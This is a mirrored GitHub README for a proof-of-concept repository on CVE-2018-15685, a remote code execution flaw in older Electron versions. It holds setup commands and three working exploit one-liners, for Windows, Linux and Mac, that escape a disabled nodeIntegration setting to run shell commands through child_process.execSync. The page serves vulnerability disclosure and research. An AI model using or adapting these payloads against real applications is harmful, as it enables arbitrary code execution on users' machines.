Coder Social home page Coder Social logo

electron_rce's Introduction

CVE-2018-15685 - Electron WebPreferences Remote Code Execution

enter image description here This is a minimal Electron application with a POC for CVE-2018-15685.

A remote code execution vulnerability has been discovered affecting apps with the ability to open nested child windows on Electron versions (3.0.0-beta.6, 2.0.7, 1.8.7, and 1.7.15). This vulnerability has been assigned the CVE identifier CVE-2018-15685.

The project contains the fillowing files:

  • main.js - This is the app's main process. Note this has nodeIntegration disabled so it should not be possibe use "process"
  • index.html - This is an example rendered page. This could be remotely controlled URL, or a page from an application with an XSS. In this example even though it is a local file but should not have access to node bindings.

To Use

To clone and run this repository you'll need Git and Node.js (which comes with npm) installed on your computer. From your command line:

# Clone this repository
git clone https://github.com/rahulr311295/Electron_RCE.git
# Go into the repository
cd Electron_RCE
# Start a PHP Server
sudo php -S localhost:80
# Install dependencies
npm install
# Run the app
npm start

To Run

Windows

# Exploit Code
window.open().open('data:text/html,Code Execution <br><pre>Exploited: <pre><script>document.write(require("child_process").execSync("calc.exe"))</scr'+'ipt></pre></br></br><pre>Whoami: <pre><script>document.write(require("child_process").execSync("whoami"))</scr'+'ipt></pre></pre>');

# Which Executes Calculator and shows which user is currently logged in

Windows

Linux

# Exploit Code
window.open().open('data:text/html,Code Execution <br><pre>Exploited: <pre><script>document.write(require("child_process").execSync("ls"))</scr'+'ipt></pre></br></br><pre>Whoami: <pre><script>document.write(require("child_process").execSync("whoami"))</scr'+'ipt></pre></pre>');

# Which lists files and shows which user is currently logged in

Linux

Mac

# Exploit Code
window.open().open('data:text/html,Code Execution <br><pre>Exploited: <pre><script>document.write(require("child_process").execSync("ls"))</scr'+'ipt></pre></br></br><pre>Whoami: <pre><script>document.write(require("child_process").execSync("open /Applications/Calculator.app"))</scr'+'ipt></pre></pre>');

# Which Executes Calculator and lists files in the directory

Linux

**For More Information about this Vulnerability **

Full write up on the Contrast Security blog or the write up on the offical blog from Electron

Credits to

Matt Austin for the original POC

electron_rce's People

Contributors

jamoski3112 avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.